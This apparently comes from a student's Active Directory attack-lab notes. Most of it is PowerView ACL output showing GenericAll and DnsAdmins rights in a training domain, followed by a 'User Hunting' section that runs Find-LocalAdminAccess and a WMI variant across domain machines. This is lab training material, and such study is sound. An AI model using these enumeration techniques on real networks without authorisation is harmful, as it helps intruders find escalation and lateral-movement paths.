IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=DFSR-LocalSettings,CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1000
IdentityReferenceName : DCORP-DC$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : Inherited
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1000
IdentityReferenceName : DCORP-DC$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : Inherited
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1000
IdentityReferenceName : DCORP-DC$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=A.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=B.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=C.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=D.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=E.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=F.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=G.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=H.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=I.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=J.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=K.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=L.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=M.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

User Hunting
Using PowerView
Finding the machines on which the current user has local administrative privileges
Find-LocalAdminAccess – This function queries the Domain Controller for the list of computers (Get-DomainComputer) and then runs Invoke-CheckLocalAdminAccess against each machine using multiple threads. It leaves a logon event (4624) and a logoff event (4634) in the Security event log of every machine it checks.
PS C:\Users\student163> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
dcorp-adminsrv.dollarcorp.moneycorp.local
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Find-LocalAdminAccess uses the SMB and RPC protocols. If the ports used by SMB and RPC are blocked, we can use WMI or PowerShell Remoting instead.

Find-WMILocalAdminAccess.ps1 – This script uses WMI to find out whether the current user is a local administrator on the machines in the domain. Like Find-LocalAdminAccess, it leaves a logon event (4624) and a logoff event (4634) in the Security event log of every machine it checks. To use this script, we first need to create a file that lists all the computers in the domain; we can obtain that list with Get-DomainComputer.
PS C:\Users\student163> Get-DomainComputer | Select Name

name
----
DCORP-DC
DCORP-ADMINSRV
DCORP-APPSRV
DCORP-CI
DCORP-MGMT
DCORP-MSSQL
DCORP-SQL1
DCORP-STDADMIN
DCORP-STD161
DCORP-STD162
DCORP-STD163
DCORP-STD164
DCORP-STD165
DCORP-STD166
DCORP-STD168
DCORP-STD167
DCORP-STD169
DCORP-STD170
DCORP-STD171
DCORP-STD172
DCORP-STD173
DCORP-STD174
DCORP-STD175
DCORP-STD176
DCORP-STD177
DCORP-STD178
DCORP-STD180
DCORP-STD179

We now create a file with the list of computers and pass it to the script Find-WMILocalAdminAccess.ps1.
PS C:\Users\student163> . C:\Ad\Tools\Find-WMILocalAdminAccess.ps1
PS C:\Users\student163> Find-WMILocalAdminAccess -ComputerFile
"C:\Users\student163\Desktop\shared\Computers.txt"

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
RegisteredUser : Windows User
SerialNumber : 00454-80000-00000-AA677
Version : 10.0.20348

